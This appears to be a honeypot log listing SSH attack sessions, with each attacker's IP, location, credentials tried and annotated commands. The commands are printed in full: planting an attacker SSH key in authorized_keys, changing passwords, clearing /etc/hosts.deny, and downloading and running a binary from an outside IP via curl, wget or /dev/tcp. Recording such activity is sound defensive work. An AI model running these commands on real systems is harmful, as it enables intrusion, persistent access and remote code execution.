$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "system\nHrpXZIiTEzAH\nHrpXZIiTEzAH"|passwd|bash
$ echo "system\nHrpXZIiTEzAH\nHrpXZIiTEzAH\n"|passwd
🎭 stroopwafel_sol_3 (45.156.87.254) β€” Eygelshoven, Netherlands Β· 2 sessions Β· 2 cmds
2026-05-04 06:09 EDT Β· as root/12345678, root/tesTtest123a
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m Γ—2
🎭 bistro_root_15 (88.142.46.185) β€” Issy-les-Moulineaux, France Β· 2 sessions Β· 40 cmds
2026-05-04 04:36 EDT Β· as admin/%TGBnhy6, rustserver/1234
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "1234\nrJZnVuHyXVBJ\nrJZnVuHyXVBJ"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "1234\nrJZnVuHyXVBJ\nrJZnVuHyXVBJ\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "%TGBnhy6\nUX0pgMHOvSfm\nUX0pgMHOvSfm"|passwd|bash
$ echo "%TGBnhy6\nUX0pgMHOvSfm\nUX0pgMHOvSfm\n"|passwd
🎭 ghost_root_10 (41.128.181.199) β€” Cairo, Egypt Β· 2 sessions Β· 40 cmds
2026-05-04 04:36 EDT Β· as admin/%TGBnhy6, rustserver/1234
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "%TGBnhy6\n7jY4jhmdsfch\n7jY4jhmdsfch"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "%TGBnhy6\n7jY4jhmdsfch\n7jY4jhmdsfch\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "1234\nRGl1L5br97a9\nRGl1L5br97a9"|passwd|bash
$ echo "1234\nRGl1L5br97a9\nRGl1L5br97a9\n"|passwd
🎭 ghost_root_130 (47.243.208.30) β€” Hong Kong, Hong Kong Β· 1 session Β· 3 cmds
2026-05-04 03:37 EDT Β· as root/12345678
echo β†’ payload download from C2 β†’ execute from /tmp
$ echo 1 > /dev/null && cat /bin/echo
$ nohup $SHELL -c "curl http://49.232.201.200:9571/linux -o /tmp/oeAUvrl5HK; if [ ! -f /tmp/oeAUvrl5HK ]; then wget http://49.232.201.200:9571/linux -O /tmp/oeAUvrl5HK; fi; if [ ! -f /tmp/oeAUvrl5HK ]; then exec 6<>/dev/tcp/49.232.201.200/9571 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/oeAUvrl5HK ; chmod +x /tmp/oeAUvrl5HK && /tmp/oeAUvrl5HK M0zgpM6f3NnVNu6Hpi6kguoi1N7ahd6t419cQ17ossyD3sbbLeWJpjSkkO4o2sbahdCu4EJAQVvrqs6A3d3MKeyJuDWvnuc23tnXh86t4VlSRFz/rs6Ew9rZLPGBpTGsiesq1cjfgcyy411cQ17gssyA29LVK++Htjamnu0o2cbfg8ay4FpIS1nprt6F1MbeK+2epDCnnu0o3NLUhMmt8VhFXF3hpdCG2MbdK+mKrzWvhf8s28bfhc2y41xKXF/hpsaC39HMLOiepDWmnu4u2MbciMem6VtGR0zipdCI1cbdKe2epDCkiucr2d3Nhcmy6VpcQV//rceE197cKeyAtjGng/Ep1cbcgcey4F9FSFrlqMyR3NnVNu6Jry6lhfEq3NvXh86t4VlSRlv/rsqCw9rcIPGDpjqug+0hzNzan8aq/11FRELjrMeL29jdK+yQpzKlnu4q1cbfg82y5llIS1zlrt6A2t7CIOeery6ngOki1dDaht6o5kJARl7/qcaf1dzWLu+Bpjm2iPEp2dzDg86y4FRFSFvnpMiR3tHCIeiepDOhnucs1t7ah8e85VtcSlr/rsef3N/cIumApzGvkOsvwtrZgtCt5ltcQ1/gpsiB3NjZOO6Ipi6hhvEp39/Dgsmm51xDQVnxrc+Iw9zZNuaFuDKihOUh29nYkc+t6UJKS0Lgrcef3NzeIumGpja2gu8qwtrcn8+u4EJAQ1rrpc2B2sjYL/GCpTm4gvEq2NLViM6v8VhHXF3jpdCIw9ncLOWIpTSuzyKVTI3aBmdgIbPNpd8zfWw5jI/ra3PQRE69zNc=; fi; echo 12345678 > /tmp/.opass; chmod +x /tmp/oeAUvrl5HK && /tmp/oeAUvrl5HK M0zgpM6f3NnVNu6Hpi6kguoi1N7ahd6t419cQ17ossyD3sbbLeWJpjSkkO4o2sbahdCu4EJAQVvrqs6A3d3MKeyJuDWvnuc23tnXh86t4VlSRFz/rs6Ew9rZLPGBpTGsiesq1cjfgcyy411cQ17gssyA29LVK++Htjamnu0o2cbfg8ay4FpIS1nprt6F1MbeK+2epDCnnu0o3NLUhMmt8VhFXF3hpdCG2MbdK+mKrzWvhf8s28bfhc2y41xKXF/hpsaC39HMLOiepDWmnu4u2MbciMem6VtGR0zipdCI1cbdKe2epDCkiucr2d3Nhcmy6VpcQV//rceE197cKeyAtjGng/Ep1cbcgcey4F9FSFrlqMyR3NnVNu6Jry6lhfEq3NvXh86t4VlSRlv/rsqCw9rcIPGDpjqug+0hzNzan8aq/11FRELjrMeL29jdK+yQpzKlnu4q1cbfg82y5llIS1zlrt6A2t7CIOeery6ngOki1dDaht6o5kJARl7/qcaf1dzWLu+Bpjm2iPEp2dzDg86y4FRFSFvnpMiR3tHCIeiepDOhnucs1t7ah8e85VtcSlr/rsef3N/cIumApzGvkOsvwtrZgtCt5ltcQ1/gpsiB3NjZOO6Ipi6hhvEp39/Dgsmm51xDQVnxrc+Iw9zZNuaFuDKihOUh29nYkc+t6UJKS0Lgrcef3NzeIumGpja2gu8qwtrcn8+u4EJAQ1rrpc2B2sjYL/GCpTm4gvEq2NLViM6v8VhHXF3jpdCIw9ncLOWIpTSuzyKVTI3aBmdgIbPNpd8zfWw5jI/ra3PQRE69zNc=" & // payload download from C2
$ head -c 3716336 > /tmp/xXu8rpadGQ // execute from /tmp
🎭 wraith_root_113 (102.210.148.92) β€” Johannesburg, South Africa Β· 1 session Β· 19 cmds
2026-05-04 03:34 EDT Β· as root/ravi
echo β†’ payload download from C2 β†’ execute from /tmp
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:DAVqFbfxN5GC"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 bibimbap_root_15 (211.215.17.214) β€” Seo-gu, South Korea Β· 1 session Β· 1 cmd
2026-05-04 03:13 EDT Β· as Administrator/ADMIN@12345
echo
$ echo TEST
🎭 eagle_root_61 (96.78.175.36) β€” San Francisco, United States Β· 1 session Β· 20 cmds
2026-05-04 01:27 EDT Β· as ubuntu/zxcvbnm
echo
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "zxcvbnm\n3ZbsfyB469bo\n3ZbsfyB469bo"|passwd|bash
$ Enter new UNIX password:
$ echo "zxcvbnm\n3ZbsfyB469bo\n3ZbsfyB469bo\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_root_118 (41.59.86.232) β€” Dar es Salaam, Tanzania Β· 3 sessions Β· 58 cmds
2026-05-03 23:38 EDT Β· as admin/1q2w#E$R, root/123!@#, root/Fh123456
echo
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "1q2w#E$R\nZVAGGMtVIWjs\nZVAGGMtVIWjs"|passwd|bash
$ Enter new UNIX password:
$ echo "1q2w#E$R\nZVAGGMtVIWjs\nZVAGGMtVIWjs\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:8b3nia2aiO6q"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ echo "root:DslRBIlzJ8rN"|chpasswd|bash
🎭 silk_root_35 (103.153.5.9) β€” Haidian, China Β· 3 sessions Β· 58 cmds
2026-05-03 23:36 EDT Β· as admin/1q2w#E$R, root/123!@#, root/Fh123456
echo
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo "root:5jE4eVQ3hx4P"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:LiPDNSYJg8Ow"|chpasswd|bash
$ echo -e "1q2w#E$R\ncGAfyKjU0VUJ\ncGAfyKjU0VUJ"|passwd|bash
$ Enter new UNIX password:
$ echo "1q2w#E$R\ncGAfyKjU0VUJ\ncGAfyKjU0VUJ\n"|passwd
🎭 rogue_root_132 (14.224.213.222) β€” Hanoi, Vietnam Β· 1 session Β· 20 cmds
2026-05-03 23:14 EDT Β· as ubuntu/123456798
echo
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123456798\nTI9ujjEYJ5iF\nTI9ujjEYJ5iF"|passwd|bash
$ Enter new UNIX password:
$ echo "123456798\nTI9ujjEYJ5iF\nTI9ujjEYJ5iF\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_root_119 (43.155.21.198) β€” Hong Kong, Hong Kong Β· 1 session Β· 20 cmds
2026-05-03 21:48 EDT Β· as test/Admin123
echo
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "Admin123\nq6FLvAVXLad7\nq6FLvAVXLad7"|passwd|bash
$ Enter new UNIX password:
$ echo "Admin123\nq6FLvAVXLad7\nq6FLvAVXLad7\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wraith_root_114 (152.32.130.144) β€” Hong Kong, Hong Kong Β· 1 session Β· 20 cmds
2026-05-03 20:37 EDT Β· as test/test000
file attribute tampering β†’ SSH key persistence β†’ CPU profiling
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "test000\nZ0uJ5L6ains7\nZ0uJ5L6ains7"|passwd|bash
$ Enter new UNIX password:
$ echo "test000\nZ0uJ5L6ains7\nZ0uJ5L6ains7\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wraith_root (10.0.28.1) β€” Unknown Β· 1 session Β· 2 cmds
2026-05-03 19:32 EDT Β· as root/password
sudo β†’ exit
$ sudo echo hello testing
$ exit